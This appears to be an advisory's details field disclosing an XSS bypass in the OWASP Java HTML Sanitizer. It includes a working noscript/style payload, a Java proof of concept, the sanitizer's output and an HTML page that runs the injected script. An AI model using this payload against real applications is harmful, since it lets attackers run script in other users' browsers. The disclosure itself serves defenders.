+ "details": "### Summary\nThe OWASP Java HTML Sanitizer is vulnerable to XSS when an `HtmlPolicyBuilder` policy allows the `noscript` and `style` tags together with `allowTextIn` for the `style` tag. A crafted payload can then pass through the sanitizer with its CSS content unsanitized, so that tags not allowed by the HTML policy reach the browser. \n\n### Details\n\nThe OWASP Java HTML Sanitizer is vulnerable to XSS. This happens only when the `HtmlPolicyBuilder` policy allows the `noscript` and `style` tags and also uses `allowTextIn` for the `style` tag.\n\nThis is an edge case: if a policy allows the `style` tag with `allowTextIn` for `style`, combined with any tags other than `noscript`, the sanitized output is safe from XSS. The difference comes from how the browser parses `noscript` tags after sanitization. \n\n### PoC\n\n1. Create an `HtmlPolicyBuilder` policy that allows the `p, noscript, style` HTML tags and calls `.allowTextIn(\"style\")`.\n2. Take two XSS payloads that are nearly identical; the only difference is that one uses a `p` tag and the other uses a `noscript` tag.\nBoth payloads contain `script` tags that could cause XSS and should be stripped out by sanitization.\n\n```HTML\n1. <noscript><style></noscript><script>alert(1)</script>\n2. <p><style></p><script>alert(1)</script>\n```\n\n3. Run the following code, which sanitizes both payloads. 
\n\n```java\nimport org.owasp.html.HtmlPolicyBuilder;\nimport org.owasp.html.PolicyFactory;\n\npublic class Main {\n\tprivate static final String ALLOWED_HTML_TAGS = \"p, noscript, style\";\n\n\t/**\n\t * Description of vulnerability:\n\t * The OWASP sanitizer sanitizes user input against the whitelisted HTML tags defined in the policy.\n\t * However, even when script tags are not allowed by the HTML element policy, XSS is still possible in edge cases.\n\t */\n\n\tpublic static void main(String[] args) {\n\t\twithAllowedTextAndStyleTag();\n\t}\n\n\t/**\n\t * Test case: vulnerable to XSS\n\t */\n\tpublic static void withAllowedTextAndStyleTag() {\n\t\tHtmlPolicyBuilder htmlPolicyBuilder = new HtmlPolicyBuilder();\n\t\tPolicyFactory policy = htmlPolicyBuilder\n\t\t\t\t.allowElements(ALLOWED_HTML_TAGS.split(\"\\\\s*,\\\\s*\"))\n\t\t\t\t.allowTextIn(\"style\")\n\t\t\t\t.toFactory();\n\t\tString untrustedHTMLOne = \"<noscript><style></noscript><script>alert(1)</script>\";\n\t\tString untrustedHTMLTwo = \"<p><style></p><script>alert(1)</script>\";\n\n\t\tSystem.out.println(\"PAYLOAD: \" + untrustedHTMLOne + \"\\nSANITIZED OUTPUT: \" + policy.sanitize(untrustedHTMLOne));\n\t\tSystem.out.println(\"PAYLOAD: \" + untrustedHTMLTwo + \"\\nSANITIZED OUTPUT: \" + policy.sanitize(untrustedHTMLTwo));\n\t}\n}\n```\n\nUse the latest library version:\n\n```xml\n\t\t<dependency>\n\t\t\t<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>\n\t\t\t<artifactId>owasp-java-html-sanitizer</artifactId>\n\t\t\t<version>20240325.1</version>\n\t\t</dependency>\n```\n\n4. The output of the PoC code should look like this:\n\n```HTML\n\nPAYLOAD: <noscript><style></noscript><script>alert(1)</script>\nSANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>\n\n\nPAYLOAD: <p><style></p><script>alert(1)</script>\nSANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>\n\n```\n\n5. 
Let's look at what happened during sanitization: \n\n```txt\n--------------------------| --> anything after the style tag is considered CSS and is not sanitized \nPAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS\n\n-----------------------------------| --> after sanitization, the payload in the script tag remains the same and the style and noscript tags are closed. \nSANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>\n\n-------------------| --> anything after the style tag is considered CSS and is not sanitized \nPAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS\n\n--------------------------- | --> after sanitization, the payload in the script tag remains the same and the style and p tags are closed. \nSANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>\n\n```\n\n6. Create a sample HTML page and paste in both sanitized outputs generated in step 4. \n\n```HTML\n\n<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <title>POC OF SANITIZER OUTPUT</title>\n</head>\n<body>\n\n<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->\n<noscript><style></noscript><script>alert(1)</script></style></noscript>\n\n<!-- SAFE OUTPUT -->\n<p><style></p><script>alert(1)</script></style></p>\n\n</body>\n</html>\n```\n\n7. Open this HTML page in the browser; it should pop an alert.\n\n8. Open the browser's element inspector to see what happened. On close inspection, the payload that combines the `p` tag and the `style` tag did not cause XSS: the browser treated everything after the `style` tag as CSS. \n\n9. 
The payload that combines the `noscript` tag and the `style` tag did cause XSS.\nThe browser parsed the `noscript` tag that wraps the `style` tag and then closed it at the `</noscript>` tag. The script payload that follows was therefore treated as a valid HTML tag and executed in the browser, which leads to XSS. This is very different from what happened in the previous example with the `p` tag.\n\n### Impact\n1. This could potentially lead to XSS in applications. \nRef: https://owasp.org/www-community/attacks/xss/",